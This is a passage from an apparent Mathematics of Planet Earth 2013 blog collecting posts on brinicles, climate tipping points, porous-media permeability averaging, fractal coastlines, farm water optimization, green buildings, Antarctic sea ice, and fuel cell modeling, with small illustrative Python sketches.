    Brinicles are fun things to think about, but they also have broader implications. On one hand, as heat flows through them, they contribute to the energy balance in the ice pack around Antarctica. We need better mathematical models of this ice pack, to be able to know how it’s affected by climate change. And, to build a better model, one needs to know about brinicles.

    On the other hand, there’s a lot of work going on at the moment to understand the origins of life. Many people are working on a promising theory of life’s beginnings in the hot environment of hydrothermal vents on the ocean floor. But perhaps brinicles provide a cold alternative? There are many parallels in terms of energy sources between so-called black smokers on the ocean floor and brinicles in cold environments. One of my colleagues, Hauke Trinks, has spent several winters in Svalbard looking at complex chemistry in sea ice, which is relevant for the origins of life in the cold.

    So might brinicles on the early Earth have played a role in the beginnings of life? What would the ancient mariner have made of that idea?

    Julyan Cartwright
    Consejo Superior de Investigaciones Científicas (CSIC)
    Instituto Andaluz de Ciencias de la Tierra, CSIC-UGR
    Campus Fuentenueva, E-18071 Granada, Spain
    e-mail julyan.cartwright@csic.es
    WWW http://www.lec.csic.es/~julyan/

    Posted in Biogeochemistry, Cryosphere, General | Leave a comment

    More about E.O. Wilson’s Story “Great Scientist ≠ Good at Math”

    Today’s blog is an update on a story that was in the news earlier and also some comments on a recent article in the New York Review of Books. (See the blog of 4.11.2013.)

    The E.O. Wilson story about math and science generated much discussion. David Bailey and Jonathan Borwein wrote a nice column on “The Blog” on the Huffington Post site in response to the Wilson article. They quote Darwin in the last paragraph:

    “During the three years which I spent at Cambridge my time was wasted, as far as the academical studies were concerned, as completely as at Edinburgh and at school. I attempted mathematics and even went during the summer of 1828 with a private tutor (a very dull man) to Barmouth, but I got on very slowly. The work was repugnant to me, chiefly from my not being able to see any meaning in the early steps in algebra. This impatience was very foolish, and after many years I deeply regret that I did not proceed far enough at least to understand something of the great leading principles of mathematics, for men thus endowed seem to have an extra sense.” (Charles Darwin)

    Recall that Wilson said that Darwin did not need much math and developed his theories through the power of observation.

    A melting iceberg from the South Sawyer Glacier in the Tracy Arm Fjord, near Juneau, Alaska. (From the article by Bailey and Borwein)

    The May 9th issue of The New York Review of Books has an interesting review by Bill McKibben, called “Some Like It Hot,” of three recently published reports about climate change. The first is “Climate and Social Stress: Implications for Security Analysis.” McKibben, founder of 350.org, points out that the report warns of risk to water supplies and the risk of famine and has a particular focus on yellow fever and public health risk. The second report is from the World Bank, “Turn Down the Heat: Why a 4º C Warmer World Must Be Avoided.” The focus of this report is on how the rise in temperature will make life impossible for many, especially the poor, and the effect on productivity. The final piece reviewed is a report called “The Collapse of Western Civilization: A View from the Future” by Naomi Oreskes; it is a fictional account of a report looking back from 2373 and lamenting the failure of our governments to act on climate change in the present time: “a second Dark Ages had fallen on Western civilization, in which denial and self-deception, rooted in an ideological fixation on ‘free’ markets, disabled the world’s powerful nations in the face of tragedy.”

    The review is not optimistic about the future, but it is worth reading.

    Estelle Basor
    AIM

    Posted in Biology, Evolution, General, Mathematics | Leave a comment

    ICERM IdeaLab on Tipping Points, July 15-19, 2013

    Climate tipping points refer to sudden rapid transitions of the Earth’s climate that are precipitated by initially small changes of the natural environment. For instance, tipping points could correspond to the activation of positive feedback loops that then lead to a major change in the climate. An example of one such feedback loop would be the decrease in the extent of Arctic sea ice cover, or equivalently a decrease in the Earth’s albedo, which would result in the Earth warming and a further decrease in sea ice cover. Thus, the loss of sea ice could potentially correspond to approaching a climate tipping point.

    Over the past few years, mathematicians have begun to develop mathematical theories of tipping points, which have identified a variety of different mechanisms. These mechanisms rely on different assumptions about the underlying dynamic behavior and involve, for instance, passage through bifurcations, fast-slow time scales, stochastic effects, and different types of forcing. This is an active and rapidly growing area of research in applied mathematics, and many new ideas will be needed to gain more insight into tipping points.
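    The simplest caricature of one of these mechanisms, a slow drift through a saddle-node (fold) bifurcation, fits in a few lines of Python. This is the normal form of the bifurcation, not a climate model, and the drift rate and initial conditions are arbitrary.

    import numpy as np
    from scipy.integrate import solve_ivp

    eps = 0.002                        # slow drift rate of the forcing

    def rhs(t, y):
        x, lam = y
        return [lam + x - x**3, eps]   # fast state x, slowly increasing forcing lam

    sol = solve_ivp(rhs, [0, 1000], [-1.2, -1.0], max_step=0.1)
    x, lam = sol.y
    # The lower equilibrium branch disappears at the fold lam = 2/(3*sqrt(3)) ≈ 0.385,
    # and the state "tips" to the upper branch shortly afterwards.
    jump = np.argmax(np.diff(x) > 0.05)
    print("Tipping occurs near lam = %.2f" % lam[jump])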

    To help develop new ideas and to expose more early-career researchers to climate tipping points, the Institute for Computational and Experimental Research in Mathematics (ICERM), an NSF-funded mathematical sciences institute at Brown University, will hold an IdeaLab during July 15-19, 2013. Twenty early-career researchers will work for a week in teams on projects in

    – Tipping Points in Climate Systems
    – Towards Efficient Homomorphic Encryption

    IdeaLabs bring together researchers with different backgrounds to brainstorm and get a fresh look at interesting and exciting topics of current interest. This is a great opportunity to learn more about tipping points, share ideas with peers, and get to know program officers from different funding agencies who will outline funding opportunities. Applications to this program will still be considered: more information can be found here.

    Bjorn Sandstede
    ICERM

    Posted in Climate, Mathematics, Workshop Announcement | Leave a comment

    Data Visualization and Infographics

    Last week I attended a D.C. Art Science Evening Rendezvous (DASER) at the National Academies in my hometown, Washington, DC. These events are held once a month and provide a forum to discuss art and science projects in the national capital region and beyond. This month’s theme was Data Visualization, the process of creating infographics. I had long been familiar with the concept of data visualization but only recently come across the term infographics, so the topic was very timely.

    Infographics (short for Information Graphics) are graphic visual representations of information, data or knowledge. They are intended to present complex information quickly and clearly. If done right, they enhance our visual system’s ability to see patterns and trends. Public transportation maps such as those for the Washington Metro system are examples of infographics.

    Map of the Washington, DC, Metro system

    The “gold standard” for information graphics is Charles Joseph Minard’s representation of Napoleon’s invasion of Russia. Issued in 1861, the graphic captures four different changing variables that contributed to Napoleon’s downfall in a single two-dimensional image: the army’s direction as it traveled, the locations the troops passed through, the size of the army as troops died from hunger and wounds, and the freezing temperatures they experienced.

    Minard’s 1869 Infographic of Napoleon’s Invasion of Russia

    Edward Tufte, a pioneer in data visualization, wrote a series of books on the subject of information graphics: Visual Explanations, The Visual Display of Quantitative Information, and Envisioning Information. To Tufte, a good data visualization represents every data point accurately and enables a viewer to see trends and patterns in the data. Tufte’s contribution to the field of data visualization and infographics is considered immense, and his design principles can be seen in many websites, magazines, and newspapers today.

    Katy Borner (Professor of Information Science, Indiana University, Bloomington) gave an overview of the exhibit Places & Spaces: Mapping Science, which she curated, and discussed the Information Visualization MOOC she teaches at Indiana University. She is interested in the development of cyberinfrastructure for large-scale scientific collaboration and computation. Ward Shelley, a New York-based artist, presented several examples of his information-based diagrams featured in the exhibition, among them a History of Science Fiction, which I thought was an interesting concept.

    The importance of infographics in geography was demonstrated by Gary Berg-Cross, a cognitive psychologist and executive secretary of the Spatial Ontology Community of Practice (SOCoP). He described the SOCoP project INTEROP, an Interdisciplinary Network to Support Geospatial Data Sharing, Integration, and Interoperability, which is supported by the National Science Foundation.

    The last speaker was Stephen Mautner, executive editor at the National Academies Press, Washington, D.C., who provided an update on an initiative to visually represent the many reports issued by the Academies as a network of nodes connected by common terms or concepts. The network is currently a stand-alone product that can be manipulated to highlight certain categories, with a drill-down facility that enables the user to get more detailed information.

    I decided to write about this event because the graphical representation of data will only become more important as more and more data become available. Too often, I see figures in scientific publications where space is wasted, fonts are too small, or labels are missing. The forum convinced me that a bit more thought can go a long way toward optimizing the effectiveness of infographics.

    Posted in Data Visualization, General | Leave a comment

    Flow through heterogeneous porous rocks: What average is the correct average?

    How fast does water flow through sand or soil? Maybe not so fast, but everyone has seen water soak into beach sand and garden soils. Most people have also noticed a concrete sidewalk soaking up a little water as rain begins to come down. But how fast does water flow through a rock? The obvious answer, that it does not flow at all, is incorrect: water does indeed flow through rocks. Not through the rock grains themselves, but it can squeeze through the pore spaces between the grains. We say that the Earth’s subsurface is porous, and that it is a porous medium.

    Fluid flow through the planet’s subsurface is critically important to many ecological and economic activities. Subsurface flow is an important part of the entire water cycle. In fact, the United States Geological Survey estimates that, worldwide, there is 30 times more groundwater stored in aquifers than is found in all the fresh-water lakes and rivers. Unfortunately, contaminants sometimes leach out of storage sites, either from above-ground tanks or through underground containment barriers, and travel through the Earth. Petroleum and natural gas are extracted from the subsurface by inducing these fluids to flow to production wells. To mitigate the effects of greenhouse gas accumulation in the atmosphere, technologies are being developed to sequester carbon dioxide, extracted from power plant emissions, in deep underground reservoirs. These and many other situations make it important that we have the ability to simulate the flow of fluids in the subsurface. The simulations give us a visual and quantitative prediction of the movement of the fluids, so that scientists, engineers, and regulators can design appropriate steps to, e.g., protect the natural ecosystem and human health, optimize the economic benefit of the world’s underground natural fluid resources, and minimize unintended impact on the natural environment.

    So, how fast does fluid flow in porous media? In 1856, a French civil engineer by the name of Henri Darcy determined experimentally the speed at which fluid flows through a sand column subjected to pressure. He gave us his now famous Darcy’s Law, which states that the fluid velocity is proportional to the pressure gradient. Subsequent experiments verified that the law holds for a wide range of porous media. The proportionality constant in Darcy’s law, times the fluid viscosity, is called the permeability of the porous medium. The permeability is a measure of how easily fluid flows through a rock or soil.
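In symbols (standard notation, not spelled out in the original post), Darcy’s law reads $q = -\frac{k}{\mu}\,\nabla p$, where $q$ is the volumetric flux per unit area (the Darcy velocity), $k$ is the permeability, $\mu$ is the fluid viscosity, and $\nabla p$ is the pressure gradient; the minus sign expresses the fact that fluid flows from high pressure to low pressure.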

    There are many difficulties associated with simulating the flow of fluid through a natural porous medium like a groundwater aquifer or a petroleum reservoir. One of them is dealing with the extreme heterogeneity of a natural rock formation. One sees this extreme heterogeneity in outcrops, which are rock formations that are visible on the surface of the Earth, such as is often seen from a roadway which has been cut into a hill or mountain. In Figure 1, we show results from researchers at the University of Texas at Austin’s Bureau of Economic Geology, who measured the permeability of an outcrop. The permeability is shown on a log scale, and it varies from $10^{-16}$ (blue) to $10^{-11}$ (red) over a few meters. That is, the fluids can be moving about 100,000 times faster in one area of the rock than another less than a meter away.

    Figure 1. Permeability of an outcrop (on a log scale).

    An underground aquifer or reservoir domain can be very large, spanning a few to hundreds of kilometers. Normally a simulation of fluid flow will involve a computational grid of cells that cover the domain. Even the fastest supercomputers can handle only enough cells for each to be about ten meters on a side. But at that scale, we have lost all details of the permeability’s heterogeneity, and consequently many important details of the fluid flow! So the challenge is to capture the effect of the fine-scale details of the flow without using a computational grid fine enough to resolve them. It sounds like a contradiction.

    This is one place where mathematics and mathematicians can help. Since we cannot resolve all the details of the flow, let us make as our goal the ability to approximate the average flow within each grid cell, by simplifying the geologic structure of the porous medium. That is, we desire to replace the complex heterogeneous porous medium within a grid cell by a simple homogeneous porous medium with an average value of permeability, as depicted in Figure 2. But what should this average permeability be? It should be chosen so that the average amount of fluid flowing through the grid cell is the same for the true and fictitious media.

    Figure 2. The heterogeneous porous medium is replaced by a homogeneous one with an average permeability k, chosen so that the average amount of fluid flow is the same.

    It is fairly easy to solve the differential equations governing the flow of fluid in simple geometries. For a layered porous medium, there are two possibilities. As depicted in Figure 3, when the flow runs along the geologic layers, the correct way to average the permeability is to take the usual arithmetic average, in this case (k1 + k2)/2.

    Figure 3. Flow going along with the geologic layers requires arithmetic averaging of the permeability k.

    When fluid flows so that it cuts through the layers, as depicted in Figure 4, the arithmetic average permeability does not give the correct average fluid flow. This is perhaps easiest to see by considering the possibility that one of the layers becomes impermeable, say k1 = 0, so that fluid cannot flow through it. In this case, there will be no flow through the entire grid cell. But the arithmetic average is k2/2 > 0, so using it we would incorrectly predict some fluid flow through the grid cell. The correct average to take is the harmonic average, which is the reciprocal of the arithmetic average of the reciprocals, i.e., 2/(1/k1 + 1/k2).

    Figure 4. Flow that cuts through the geologic layers requires harmonic averaging of the permeability k.

    The harmonic average is always less than or equal to the arithmetic average. But what about a genuinely heterogeneous porous medium like that shown in Figure 5? More sophisticated averaging techniques must be used, such as arise in the mathematical theory of homogenization. It can be proven that the correct average always lies between the harmonic and arithmetic averages, so our layered case actually gives the extreme cases of the problem. In fact, homogenization is also able to account for the fact that porous media may be anisotropic, i.e., they do not behave the same in every direction. The example in Figure 5 is anisotropic, since perhaps one can see that as fluid tries to flow from left to right, it will also tend to flow upwards a bit as well.

    Figure 5. Flow through a heterogeneous geologic region requires more complex averaging of the permeability.
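The bounds mentioned above are easy to check numerically. The short Python sketch below (with arbitrary, illustrative permeability values) computes the harmonic and arithmetic averages of a stack of layers; the geometric mean, a common intermediate estimate, always falls between the two, just as any true effective permeability must.

    import numpy as np

    # Layer permeabilities (illustrative values only, in arbitrary units).
    k = np.array([1e-16, 5e-14, 2e-12, 1e-11])

    arithmetic = k.mean()                        # correct for flow along the layers
    harmonic = len(k) / np.sum(1.0 / k)          # correct for flow across the layers
    geometric = np.exp(np.mean(np.log(k)))       # a common intermediate estimate

    print(f"harmonic   {harmonic:.3e}")
    print(f"geometric  {geometric:.3e}")
    print(f"arithmetic {arithmetic:.3e}")
    # Any effective permeability lies between the harmonic and arithmetic means.
    assert harmonic <= geometric <= arithmetic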

    These averaging techniques work well for even very complex geology. For example, consider the heterogeneous rock shown in Figure 6, which is a complex mixture of fossil remains, limestone, sediments, and vugs, which are large open spaces in the rock. Without a theoretically sound mathematical averaging technique, would you like to guess the average permeability of this rock?

    Figure 6. A highly heterogeneous, vuggy porous medium.

    Mathematicians have also developed more complex numerical models that not only give the correct average flow but also attempt to recover some of the small-scale variability of the flow. Such multi-scale numerical methods are an active area of research today. These methods can allow scientists and engineers to simulate the flow of fluids in the subsurface in an accurate way, even on computational grids too coarse to resolve all the details. It almost seems like magic. But it is not magic; it is mathematics.

    Todd Arbogast
    Professor of Mathematics
    University of Texas at Austin

    Posted in Geophysics, Mathematics | Leave a comment

    SIAM Conference “Applications of Dynamical Systems” and MPE2013

    The Earth is a giant dynamical system that evolves over time at various scales, depending on the state(s) of interest. Therefore, it is not surprising that a conference on applied dynamical systems would feature topics central to Mathematics of Planet Earth 2013. Indeed, the organizers of the SIAM Conference on Applied Dynamical Systems named MPE 2013 a conference theme.

    Several minisymposia are clustered around MPE 2013 concerns. Among them are a session on Dynamics of Marine Ecosystems and another, labeled, appropriately enough, Dynamics of Planet Earth. Speakers in the latter, which is organized by Hans Kaper, will discuss energy balance models, ocean circulation models, and the carbon cycle. The focus of the session will be on challenges arising in the mathematical sciences, and dynamics in particular, in modeling these complex systems and analyzing their behavior. We often hear the term “tipping point,” popularized by writer Malcolm Gladwell. Using the conceptual framework of bifurcation theory, Mary Silber will introduce the mathematical mechanisms of tipping points and highlight some of the challenges and limitations encountered in exploiting this framework; noteworthy application areas include the retreat of arctic sea ice and desertification. The concept of tipping points also surfaces in the talk of Marty Anderies on carbon cycle dynamics; here, the goal is to construct a reasonable representation of a feedback system between different carbon stores and use it to explore what might be called a “safe operating space” for humans.

    These and related conference sessions and talks exemplify the many ties between dynamics and MPE 2013 and show how mathematics contributes to our understanding of the Earth.

    Posted in Climate, Conference Announcement, Mathematics | Leave a comment

    Some universality in fractal sea coasts?

    Sandy coasts have a smooth profile, while rocky coasts have a fractal nature. One characteristic feature of a rocky coast is that new details appear when we zoom in on it. And if we were to measure the length of the coast, the length would increase significantly when zooming in on the details. If we model this coast as a curve, then this curve would have an infinite length. One summarizes some characteristics of the coast through a number, the fractal dimension, which describes the “complexity” of the curve. A smooth curve has a dimension of 1, while a surface has a dimension of 2. A dimension between 1 and 2 is typical of a self-similar object which is thicker than a curve but has an empty interior. How does the dimension of a fractal coast depend on the coast? An article by Sapoval, Baldassarri and Gabrielli (Physical Review Letters, 2004) presents a model suggesting that this dimension is independent of the particular coast and very close to 4/3.

    The model of Sapoval, Baldassarri and Gabrielli describes the evolution of the coast from a straight line to a fractal coast through two processes with two different time scales: a fast time and a slow time. The mechanical erosion occurs rapidly, while the chemical weakening of the rocks occurs slowly. The force of the waves acting on the coast depends on the length of the coast: the waves have a stronger destructive power when the coast is straight, and a damping effect takes place when the coast is fractal. The erosion model is a kind of percolation model, with the resisting Earth modeled by a square lattice. The lithology of each cell, i.e., the resistance of its rocks, is represented by a number between 0 and 1. The resistance to erosion of a site, also given by a number between 0 and 1, depends both on its lithology and on the number of sides exposed to the sea. Then an iterative process starts: each site with resistance number below a threshold disappears, and the resistances of the remaining sites are updated because new sides become exposed to the sea. This leads to the creation of islands and bays, thus increasing the perimeter of the coast. When the perimeter is sufficiently large, thus weakening the strength of the waves, the rapid dynamics stops, even if the power of the waves is nonzero! During this period the dimension of the coast is very close to 4/3.
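For readers who like to experiment, here is a minimal Python sketch (my own toy version, not the authors’ code) of the fast-erosion step just described. It uses an assumed rule for how exposed sides weaken a site and omits the feedback between coastline length and wave power, so it only illustrates the flavor of the iteration.

    import numpy as np

    rng = np.random.default_rng(0)
    NX, NY = 120, 60                 # lattice size (chosen for illustration)
    THRESHOLD = 0.3                  # erosion threshold (assumed)

    lithology = rng.random((NY, NX))        # intrinsic rock strength of each site
    rock = np.ones((NY, NX), dtype=bool)    # True = rock, False = sea
    rock[0, :] = False                      # the sea initially borders a straight coast

    def exposed_sides(rock):
        """Count, for each site, how many of its 4 neighbors are sea."""
        sea = ~rock
        n = np.zeros(rock.shape, dtype=int)
        n[1:, :] += sea[:-1, :]
        n[:-1, :] += sea[1:, :]
        n[:, 1:] += sea[:, :-1]
        n[:, :-1] += sea[:, 1:]
        return n

    while True:
        n = exposed_sides(rock)
        # Assumed rule: each exposed side weakens a site's lithology by 25%.
        # Depending on THRESHOLD, the erosion either arrests (leaving a rough
        # coast) or eats through the lattice, reflecting the percolation character.
        resistance = lithology * (1.0 - 0.25 * n)
        eroded = rock & (n > 0) & (resistance < THRESHOLD)
        if not eroded.any():
            break                    # the fast dynamics stops; the coast has roughened
        rock[eroded] = False

    coastline = exposed_sides(rock)[rock].sum()
    print("sites eroded:", int((~rock).sum()) - NX, "coastline length:", int(coastline))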

    Once the fast dynamics has stopped, the slow dynamics takes over: chemical weakening of the remaining sites continues, gradually reducing their resistance to erosion. The slow dynamics is interrupted by short episodes of fast erosion whenever the resistance number of a site falls below the threshold. This alternation of short episodes of fast erosion and long episodes of chemical weakening is exactly what we observe now, since the initial fast dynamics occurred long ago.

    The model presented here is a gradient percolation model, with the sea percolating into the land, and such gradient percolation models are known to exhibit universality properties.

    Christiane Rousseau

    Posted in Geophysics, Ocean | Leave a comment

    “Sustainability Improves Student Learning (SISL) in STEM”

    How precarious is the existence of the Monarch butterfly? Does personal diet affect the environment? What are the consequences of increased human life expectancy?

    Last month I spent three days with nearly two dozen mathematics colleagues and sustainability experts at the MAA Carriage House. We organized, refined, and developed sustainability-focused modules for use in the introductory undergraduate math classroom. This workshop is part of the mathematics community’s contribution to the Association of American Colleges and Universities’ broader “Sustainability Improves Student Learning (SISL) in STEM” initiative, which has brought together numerous professional societies to better prepare undergraduate students for the 21st-century “Big Questions” that relate to real-world challenges such as energy, air and water quality, and climate change.

    Not surprisingly, these “Big Questions” are frequently investigated through mathematics; however, this workshop focused on identifying ways to make these topics appropriate and accessible to students taking their first college math course. Currently, 20 sustainability activities have been released for general use on the Science Education Resource Center (SERC) website at Carleton College.

    I believe this is just the beginning, as the SISL page on the SERC site is designed to be a resource for everyone interested in sustainability-themed mathematics curricula.

    I invite you to view, use and submit activities on this site.

    Benjamin Galluzzo
    BJGalluzzo@ship.edu

    Posted in General, Mathematics, Sustainability, Workshop Report | Leave a comment

    Raspberry Fields Forever (cont’d)

    In a recent conversation, an acquaintance asked me, “What do you do besides frustrate people with algebra?” Sadly, she was serious. She had no idea of the use of mathematics outside of designing torture mechanisms for young people in school. Our team had begun our initial work on what we call the “berry problem,” and I was able to describe our efforts to help stakeholders in the Pajaro Valley region of California balance water needs among competing interests.

    This problem is one realization of a scenario that is becoming common across the country. Estelle Basor eloquently wrote of the farming community that has existed in the region for generations. (See the blog of 4/18/2013.) Agricultural needs, along with increased urbanization, have stressed the underlying aquifer, leading to significant saltwater contamination of water-supply wells. The region has been studied for decades, and hydrologists understand the sustainable yield that will prevent further degradation of the resource. Primary crops in the region include strawberries, raspberries, blackberries, blueberries, and lettuce. In fact, as Estelle mentioned in her earlier post, at least 60% of the strawberries produced in the U.S. are grown in this region. (California produces almost 90% of the berries available in a given year!) Strawberries require significant irrigation, so it is infeasible to dedicate an entire farm to strawberries while keeping the farm under its water-use limit.

    Our team has designed a 100-acre “model” farm that we have used to forecast profitability and water use given certain planting rules for a variety of crops. We use the model in an optimization framework to give farmers strategies for maintaining their livelihood under restrictions imposed by the water management agency. Our future work will include use of more sophisticated modeling tools for the farm environment and analysis of infiltration networks.
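To give a flavor of the kind of planning question the model answers, here is a deliberately tiny Python sketch (all crop names, profits, and water requirements are invented placeholders, and the real model has hundreds of constraints): choose acreages on a 100-acre farm to maximize profit subject to a water budget.

    from scipy.optimize import linprog

    crops = ["strawberries", "raspberries", "lettuce"]
    profit_per_acre = [12000.0, 9000.0, 4000.0]   # dollars/acre (assumed)
    water_per_acre = [2.5, 1.8, 1.0]              # acre-feet/acre (assumed)
    water_budget = 180.0                          # acre-feet available (assumed)

    # linprog minimizes, so negate the profits.
    c = [-p for p in profit_per_acre]
    A_ub = [water_per_acre, [1.0, 1.0, 1.0]]      # water limit and 100-acre land limit
    b_ub = [water_budget, 100.0]

    res = linprog(c, A_ub=A_ub, b_ub=b_ub, bounds=[(0, None)] * 3)
    for crop, acres in zip(crops, res.x):
        print(f"{crop:12s} {acres:6.1f} acres")
    water_used = sum(w * a for w, a in zip(water_per_acre, res.x))
    print(f"profit ${-res.fun:,.0f}, water used {water_used:.1f} acre-feet")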

    We are honored to be able to contribute to solving a problem that has wide applicability and environmental impact.

    Lea Jenkins, Clemson University
    Kathleen Fowler, Clarkson University
    John Chrispell, Indiana University of Pennsylvania
    Matthew Farthing, USACE, ERDC
    Matt Parno, MIT

    Posted in Mathematics, Resource Management, Sustainable Development | Leave a comment

    The Mathematics behind Green Buildings


    

Most buildings more than 20 years old are energy “hogs.” They take a lot of energy to heat in the winter, and they take a lot of energy to cool in the summer.  The benefits of saving energy in buildings are enormous:
    • Commercial and residential buildings consume more than 40% of total energy usage in the US, greater than either the transportation or the industrial sector, and this proportion is expected to increase.
    • Buildings contribute 45% of the greenhouse gas emissions linked to global climate change.
    • A 50% reduction in U.S. building energy consumption would be equivalent to taking every passenger vehicle and small truck in the United States off the road.
    • A 70% reduction in U.S. building energy consumption is equivalent to eliminating the entire energy consumption of the United States transportation sector.

    Research is now taking place to make buildings more energy efficient.  The answer lies in the mathematics of control and system theory.  The results of this research will no doubt lead to better designs of new buildings as well.

    

The HVAC system of a large building is very complex.  The key step is to model this complex system.  Heat losses and gains, from the sun, from the heated or cooled air supplies, and from occupants moving through the building, can all be modeled.  Sensors and actuators are placed throughout the HVAC system.  With a mathematical model in hand, one can start performing control and optimization.
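As a hedged illustration of the kind of model meant here (not taken from the workshop), the Python sketch below treats a single zone as a lumped thermal mass with envelope losses, solar/occupant gains, and a proportional controller standing in for the HVAC system; every parameter value is an assumption chosen for illustration.

    import numpy as np

    C = 5.0e7        # zone heat capacity, J/K (assumed)
    UA = 800.0       # envelope conductance, W/K (assumed)
    KP = 5000.0      # proportional control gain, W/K (assumed)
    T_SET = 21.0     # setpoint, deg C
    DT = 60.0        # time step, s

    hours = np.arange(0, 24, DT / 3600.0)
    T_out = 5.0 + 5.0 * np.sin(2 * np.pi * (hours - 15) / 24)   # outdoor temperature
    gains = 2000.0 * ((hours > 8) & (hours < 18))               # solar/occupant gains, W

    T = 18.0                                  # initial indoor temperature
    energy = 0.0                              # heating energy delivered, J
    for T_o, g in zip(T_out, gains):
        q_hvac = np.clip(KP * (T_SET - T), 0.0, 20000.0)   # heating only, capped
        dTdt = (UA * (T_o - T) + g + q_hvac) / C           # zone energy balance
        T += dTdt * DT
        energy += q_hvac * DT

    print(f"final indoor temperature: {T:.1f} C, heating energy: {energy/3.6e6:.1f} kWh")

With a model like this in hand, the control gain, setpoint schedules, or more sophisticated controllers can be tuned in simulation before anything is changed in the real building.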

    

From June 11-14, 2013, the IMA is offering a Hot Topics Workshop “Mathematical and Computational Challenges in the Control, Optimization, and Design of Energy-Efficient Buildings.” The workshop will present the state of the art in the mathematical and computational aspects that arise in energy-efficient building design. It will also provide participants with the opportunity to share ideas, foster collaboration, and gain a deeper understanding of the problems and challenges of managing and designing energy-efficient buildings and the progress made so far.

    The intended audience for the workshop includes mathematicians, scientists, and engineers interested in the latest developments and challenges in the mathematical and computational sciences for design, optimization, and control of energy-efficient buildings. The workshop will feature a combination of both research talks and tutorials presented by practitioners of diverse disciplines from industry, government, and academia.

    Applications are still being accepted. To view the full description of the workshop and apply on line, click here.

    Submitted by the Institute for Mathematics and its Applications (IMA)

    Posted in Energy, Mathematics | Leave a comment

    How to Reconcile the Growing Extent of Antarctic Sea Ice with Global Warming?

    My colleague Hans Engler (Georgetown University) alerted me to an interesting article in Le Monde of March 31, 2013, entitled “En Antarctique, le réchauffement provoque une extension de la banquise” (“In Antarctica, warming is causing the sea ice to expand”). The article was based on a technical paper entitled “Important role for ocean warming and increased ice-shelf melt in Antarctic sea-ice expansion,” published online on the same day in Nature Geoscience and co-authored by five climate scientists from the Royal Netherlands Meteorological Institute (KNMI) in De Bilt, The Netherlands: R. Bintanja, G. J. van Oldenborgh, S. S. Drijfhout, B. Wouters, and C. A. Katsman. The problem offers a nice challenge for mathematicians.

    Antarctic Sea Ice (AFP)

    It is well known that sea ice has a significant influence on the Earth’s climate system. Sea ice is highly reflective for incident radiation from the Sun, and at the same time it is a strong insulator for the heat stored in the upper (mixing) layer of the ocean. While global warming causes Arctic sea ice to melt at a measurable and significant rate, sea ice surrounding Antarctica has actually expanded, with record extent in 2010. How can this somewhat paradoxical behavior be reconciled with global warming? Various explanations have been put forth. Usually, the expansion of the Antarctic sea ice is attributed to dynamical atmospheric changes that induce atmospheric cooling. But the authors of the paper present an alternate explanation, which is based on the presence of a negative feedback mechanism.

    The authors claim that accelerated basal melting of Antarctic ice shelves is likely to have contributed significantly to sea-ice expansion. Observations indicate that melt water from Antarctica’s ice shelves accumulates in a cool and fresh surface layer that shields the surface ocean from the warmer deeper waters that are melting the ice shelves. Simulating these processes in a coupled climate model they found that cool and fresh surface water from ice-shelf melt indeed leads to expanding sea ice in austral autumn and winter. This powerful negative feedback counteracts Southern Hemispheric atmospheric warming. Although changes in atmospheric dynamics most likely govern regional sea-ice trends, their analyses indicate that the overall sea-ice trend is dominated by increased ice-shelf melt. Cool sea surface temperatures around Antarctica could offset projected snowfall increases in Antarctica, with implications for estimates of future sea-level rise.

    The problem offers a nice challenge in mathematical modeling. The abstract of the paper can be viewed here. The full text is behind a paywall on the same Web site.

    Posted in Climate Change, Cryosphere | Leave a comment

    Mathematical Modeling of Alternative Energy Systems: An Example of How Academic Mathematicians Can Contribute to the World

    I was asked to write this blog because I am a participant in the upcoming MPE workshop, Batteries and Fuel Cells, running November 4-8 in Los Angeles. This is part of a term-long thematic program, Materials for a Sustainable Energy Future, organized by the Institute for Pure and Applied Mathematics (IPAM) at UCLA. I was invited because I was involved with a decade-long project (1998-2008) modeling hydrogen fuel cells. This was a very applied project in collaboration with scientists at Ballard Power Systems, a Vancouver company that is a world leader in the development of these devices. It was a group project, with several other faculty members participating, notably Keith Promislow who became a close personal friend. In this blog I’ll give a description of what we did on that project. The activity then serves as an example of how academic mathematicians can become involved in work that has a direct impact on the world.

    Hydrogen fuel cells are of interest as an alternative energy technology. They are electrochemical systems that combine hydrogen and oxygen (from air) to produce electrical energy. They have potential for use in many applications, including automotive, stationary power, and small-scale power for mobile electronics. Unlike batteries, the energy source (hydrogen gas) flows through the device, so fuel cells are not intrinsically limited in capacity. These devices fit into a possible new energy economy in which energy coming from a number of sources, including renewable ones, is stored as hydrogen gas. Fuel cells have two main benefits over existing technology: they are very efficient when fueled by hydrogen, and the only end product is water, so they are non-polluting in use. It should be said that currently hydrogen is mainly produced by refining fossil fuels. These devices are now proven technology; however, they are more costly than current technologies. The development of new materials that reduce fuel cell cost and increase lifetime is the current research focus in the industry. Modeling the kinds of materials used in this industry is the subject of my current research with Keith.

    The project I was involved with began under the umbrella of MITACS, a Canadian network that supported industrial mathematics activity from 1999 until a few years ago. Actually, MITACS still exists but has broadened its scope to cover all disciplines (so the “M” no longer stands for Mathematics). There were a number of connections that led to the collaboration, but the one that makes the most interesting story starts with John Kenna, who was an engineer at Ballard at that time. He had been trained as a fuel cell engineer, but had worked at Hughes as an aeronautical engineer before coming to Ballard.

    Most of the design work for aircraft now is done with computational tools. That is, new design ideas are not made as physical models and tested experimentally. Rather, the physics of airflow and the behavior of the aircraft structure in response to stresses while in flight are described (approximately) by mathematical equations. This is the process of “mathematical modeling” in the title of this post. These equations can’t be solved exactly. For example, there is no way to get a written formula for the air speed at every point around an airplane wing. Thus, the next step is to approximate the solutions to the equations using numerical methods. This field is known as scientific computation and is my original research area. The resulting computational tools can be used to quickly and cheaply test many new airplane designs and optimize performance and safety.

    So John Kenna came to work at Ballard and, with his background, expected to have some simulation tools to help with design. However, he discovered that such tools had not yet been developed for the fuel cell industry. He was a guy with vision and thought that these would be a real help to the company. He started by taking a graduate-level mathematics course at Simon Fraser University taught by Keith, who was working there at the time. Quite soon, he realized that it would be easier to get Keith involved in the activity than to learn the math himself, and he pushed for the collaborative project with us from within the company.

    Keith and I had funding from MITACS and Ballard, and we formed a group to develop models and computational simulation tools for hydrogen fuel cells. Rather than generating thermal energy through combustion, fuel cells generate electrical power with two electrochemical steps (hydrogen separating into protons, which then combine with oxygen to form water), separated by a membrane that conducts only protons. This is shown schematically below. In this picture, the red arrows depict the movement of hydrogen from channels to catalyst sites, the green arrows the movement of oxygen from channels, and the blue arrows the movement of product water.

